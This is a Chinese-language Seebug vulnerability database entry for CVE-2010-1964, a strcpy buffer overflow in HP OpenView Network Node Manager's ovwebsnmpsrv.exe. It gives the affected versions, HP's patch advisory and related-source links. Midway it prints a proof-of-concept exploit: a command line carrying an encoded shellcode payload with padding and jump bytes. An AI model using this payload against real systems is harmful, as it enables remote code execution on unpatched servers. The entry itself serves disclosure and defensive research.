Lucene search
RootSSV:19930HistoryJul 08, 2010 - 12:00 a.m.
HP OpenView网络节点管理器ovwebsnmpsrv.exe远程溢出漏洞
2010-07-0800:00:00
Root
www.seebug.org
19
0.961 High
EPSS
Percentile
99.3%
BUGTRAQ ID: 40873
CVE ID: CVE-2010-1964
HP OpenView网络节点管理器(OV NNM)是HP公司开发和维护的网络管理系统软件,具有强大的网络节点管理功能。
OpenView网络节点管理器中可通过jovgraph.exe CGI程序到达的ovwebsnmpsrv.exe服务进程中存在缓冲区溢出漏洞。如果远程用户通过HTTP请求向变量传送了超大值,则main()函数中的strcpy调用就可能溢出静态缓冲区,导致以运行webserver用户的权限执行任意代码。
HP OpenView Network Node Manager 7.53
HP OpenView Network Node Manager 7.51
厂商补丁:
HP
HP已经为此发布了一个安全公告(HPSBMA02537)以及相应补丁:
HPSBMA02537:SSRT010027 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code
链接:https://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02217439&admit=109447626+127624536
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TU\AAAAAAAAAAAAAAAAAAAAAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPNiJEP1KbQtLKPRFPLKF2DLNkF2EDNkD2ExFoMgPJDfDqIoEaIPNLElPaQlFbDlGPJaHODMFaIWKRL0QBF7LKBrFpLKQRElFaJpNkQPD8OuIPCDCzEQHPF0LKQXGhNkBxEpEQHSKSElQYLKDtLKFaKfP1KOP1KpLlIQJoDMGqO7DxM0BUJTFcCMIhGKQmQ4CEKRBxLKBxQ4FaN3E6NkDLPKLKBxELEQJsLKC4NkC1HPMYG4GTQ4QKQKCQPYQJCaKOIpBxQOCjLKDRHkMVCmE8GCFRGpC0E8BWCCP2CoPTPhPLQgFFDGIoJuOHNpEQGpGpQ9HDPTBpBHFIMPPkGpIoKePPPPPPBpG0F0G0F0QxJJDOKoM0KOHULIO7DqIKQCE8C2GpFqQLK9HfPjDPCfCgPhIRIKEgE7KOIEBsBwBHH7KYDxKOIoJuQCCcF7PhQdJLEkKQKON5QGOyIWE8QeBNPMQqKON5BHQsBME4C0NiJCBwBwQGP1L6PjGbPYCfKRImBFO7G4FDGLC1FaNmPDGTFpKvGpG4QDPPCfQFF6CvBvBnBvF6QCQFBHQiJlEoNfKOJuK9IpBnF6CvIoP0BHDHOwGmCPKOHUMkJPH5MrF6BHMvJ5MmOmKOJuElDFCLFjOpKKM0BUEUOKG7GcQbBOCZC0CcKON5DJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC
Related
packetstorm
packetstorm
HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow
2010-07-07 00:00:00
HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
2011-03-24 00:00:00
HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
2011-03-24 00:00:00
zdi
zdi
cve
cve
CVE-2010-1964
2010-06-17 16:30:00
securityvulns
securityvulns
prion
prion
Buffer overflow
2010-06-17 16:30:00
cvelist
cvelist
CVE-2010-1964
2010-06-17 16:00:00
exploitpack
exploitpack
seebug
seebug
HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)
2010-07-07 00:00:00
HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
2014-07-01 00:00:00
metasploit
metasploit
HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
2011-03-23 15:44:55
exploitdb
exploitdb
checkpoint_advisories
checkpoint_advisories
openvas
openvas
HP OpenView Network Node Manager Multiple Vulnerabilities
2010-06-22 00:00:00
nessus
nessus
HP-UX PHSS_40708 : s700_800 11.X OV NNM7.53 IA-64 Intermediate Patch 26
2010-05-17 00:00:00
HP-UX PHSS_40707 : s700_800 11.X OV NNM7.53 PA-RISC Intermediate Patch 26
2010-05-17 00:00:00